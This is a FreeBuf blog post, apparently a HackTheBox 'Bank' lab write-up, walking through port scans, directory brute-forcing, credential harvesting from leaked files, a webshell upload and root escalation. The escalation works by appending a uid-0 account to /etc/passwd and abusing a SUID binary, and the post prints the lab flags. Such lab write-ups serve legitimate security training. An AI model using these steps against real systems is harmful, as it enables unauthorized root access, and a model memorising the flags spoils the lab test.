官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
maptnh- 关注
本文由
maptnh 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.29 | TCP:22,53,80 |
$ sudo masscan -p1-65535,U:1-65535 10.10.10.29 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')$ nmap -Pn -sV -sC -p$ports 10.10.10.29
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
balance-transfer
# echo '10.10.10.29 bank.htb' >>/etc/hosts
http://bank.htb/login.php
$ feroxbuster -u http://bank.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
$ wget -q -O - http://bank.htb/balance-transfer/ | grep -oP '(?<=href=")[^"]*' | sort | uniq | while read url; do
full_url="http://bank.htb/balance-transfer/$url"
if [[ ! "$url" =~ ^http ]]; then
full_url="http://bank.htb/balance-transfer/$url"
fi
echo "Downloading: $full_url"
wget --show-progress "$full_url" -P ./opt
done
$ ls -la| sort -n |head -n 10
$ cat 68576f20e9732f1b2edc4df5b8533230.acc
username:chris@bank.htbpassword:!##HTBB4nkP4ssw0rd!##
http://bank.htb/index.php
http://bank.htb/support.php
http://bank.htb/uploads/p0wny.htb
User.txt
137646c78ff9524501409d48a3d2a2af
Privilege Escalation
Via Passwd File
$ openssl passwd -1 -salt 123 123
$ echo 'Maptnh:$1$123$nE5gIYTYiF1PIXVOFjQaW/:0:0:Maptnh:/home/Maptnh:/bin/bash'>>/etc/passwd
$ su Maptnh
Via emergency SUID
www-data@bank:/var/www/bank/uploads$ find / -perm -4000 -type f 2>/dev/null
www-data@bank:/var/www/bank/uploads$ /var/htb/bin/emergency
Root.txt
2bd8d9c525c16f18d779a90123fa3554
已在FreeBuf发表 296 篇文章
HackTheBox
![[Meachines] [Easy] ScriptKiddie Msfvenom RCE+TRP00F权限提升+Shell -d 命令注入+msfconsole权限提升](https://image.3001.net/images/20250221/1740068049_67b754d1c6b98b84ac081.png)
![[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升](https://image.3001.net/images/20250220/1740053123_67b71a836ee0487ce1e4a.png)
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升](https://image.3001.net/images/20250220/1739981529_67b602d9122317982ce90.png)
![[Meachines] [Easy] Wifinetic FTP匿名登录+Reaver WPS PIN密码泄露权限提升](https://image.3001.net/images/20250219/1739977330_67b5f272eebf6c121a649.png)
- 296 文章数
- 60 关注者